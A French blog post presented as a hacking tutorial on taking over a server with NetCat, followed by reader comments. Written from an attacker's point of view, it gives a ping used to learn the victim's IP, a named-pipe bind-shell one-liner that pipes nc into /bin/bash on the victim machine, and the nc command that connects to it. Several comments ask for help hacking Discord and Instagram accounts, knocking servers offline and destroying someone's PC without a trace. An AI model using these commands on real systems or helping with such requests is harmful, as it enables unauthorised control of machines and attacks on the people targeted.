[Hack] Prendre le contrôle d’un serveur en 2 mn avec NetCat

Capture

 

NC, petit utilitaire qui peut faire de la magie !!!
Petit utilitaire qui peut permettre par exemple de s’échanger des messages ...
Mais aussi petit utilitaire qui peut ouvrir votre porte à n'importe quelle personne Malveillante...

 

Windows l'a bien compris, et le désactive par défaut ... ainsi, libre à l'utilisateur, en connaissance de risque de l'activer ...

 

NC ....

 

Comme j'ai pu vous le montrer précédemment, il est relativement simple de savoir qui vous ping ...

 

Aussi, mettons-nous dans la peau d'un pirate qui souhaite récupérer la vraie  IP de sa cible  ... en appliquant cette méthode : [Hack] Qui vous Ping ?!?

Capture

L'idée étant, qu'un pirate ... parvienne à exécuter un ping vers son ordinateur / serveur, depuis la machine qu'il cible

ping 37.76.55.195

 

... S'il y parvient, il n'a plus qu'à attendre de recevoir le ping

 

Capture

 

Dès lors qu'il connaît l'adresse IP ...

De la même manière qu'il est parvenu à exécuter le ping, il va exécuter la commande suivante sur la machine de sa victime :

 rm backpipe -f;mknod backpipe p && nc -l 1234 0<backpipe | /bin/bash 1>backpipe 

1234 étant un port pour l'exemple, vous pouvez en mettre un autre ;) )

Ce qui ouvrira les portes de sa victime (un Shell), et lui permettra d'avoir un contrôle total ... ou presque ...

Pour terminer ... il n'aura plus qu'à exécuter cette commande depuis son ordinateur :

nc -v 74.37.55.159 1234

Ayant pour effet, de le connecter directement au Shell de l'hôte distant ...

Capture2

Plus dans le détail :

NC recevra du texte (les commandes envoyées par l'attaquant), il le redirigera alors vers l’interpréteur de commande, ici "/bin/bash".
En recevant ce texte, bash l’exécutera, et la sortie (l'affichage) sera alors non pas affiché ... mais redirigé vers l'attaquant ...

Partagez ce contenu

20 comments

  • Une question con : si l’attaquant peut déjà exécuter la commande « ping » ou la commande « rm backpipe -f;mknod backpipe p && nc -l 1234 0backpipe » sur la cible, c’est qu’il a déjà accès à un shell non ?

    • Question con ? Non ^^
      Mais il y a une différence entre exécuter une seule commande a chaque fois, par divers moyens (comprenant donc une succession d’étape), et s’ouvrir un accès shell qui permet d’avoir un accès direct a la machine et d’enchaîner des commande sans avoir a refaire moulte opérations pour chaque ligne de commande ^^

  • Cool mais comment ont fait pour l’avoir ?

    • Eh bien Jenna, il suffit de lire les instructions ! Mais j’avoue que je préfère à télécharger ou en ligne, car cela me semble bien compliqué…

      J’ai perdu le contrôle de mon serveur, mais j’ai réussi à le reprendre.

    • Eh bien Jenna, il suffit de lire les instructions ! Mais j’avoue que je préfère à télécharger ou en ligne, car cela me semble bien compliqué…

      J’ai perdu le contrôle de mon serveur, mais j’ai réussi à le reprendre.

       

      –TwSourire– N’hésitez pas à follow !

  • Salut ce serait pour savoir ou est ce qu’il faut executer ces commandes (cmd ??) la est la seule chose que je n’ai pas compris

     

     

    • Dans l’invite de commande windows

      •      bonjour

         

         

        je voudrais demander de l’aide pour hacker ou pirater un serveur

        si quelqu’un connais quelques manipulation pour pirater un serveur je veux bien qu’on m’apprenne les base et j’aurais bien besoin de savoir comment accéder au darknet.

                                     

    • Il doit exécuté sa commande tout simplement dans un tableau de script, comme le tableau : javascript tableur

      C’est plus simple a utilisé quand vous été scripteur ou apprentie scripteur d’un certain niveau bien sûr.

      Est quand vous avais écrit, dans se site web pas exemple, vous avais écrit des ligne est des ligne entière de code.

  • Hey j’aimerai bien hacker un serveur ^^

  • Y a pas quelqu’un qui peux le faire pour momoii j’ai un serveur discorde a détruire mais JSP comment faire

  • je voudrais hack le serveur zencraft

     

  • Bien le Bonjour, à tous, je voudrais hacker un serveur et un utilisateur discord. J’ai fais beaucoup de recherche pour cela mais mes recherche non pas aboutie. J’aurais besoin d’aide pour faire cette démarche. Bien sure, je ne veux pas que l’utilisateur et le petit peuple qui à dessus sache et le vois. Je vous remercie de votre aide!

  • Bonjour j’aimerai bloquer ou du moins limiter l’accès d’un serveur  five m ou le down temporairement voir complètement est ce que c’est possible ? Serveur BAYLIFE GTA RP

  • Bonjour, j’aimerai hack un compte discord ou un compte instagram comment je pourrait faire

     

  • j’ai vraiment besoin de quelqu’un de ultra calé et déterminé qui vas détruire le pc ainsi que le compte de quelqu’un et un serveur qui est toxique et qui montre des photos de mineur ( un serveur anglais et un type anglais)

    si vous voulez vraiment m’aider et que vous êtes vraiment fort dans la matière ( donc sans laisse de trace de votre passage)

    c ‘est vraiment important.

Laisser une réponse

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *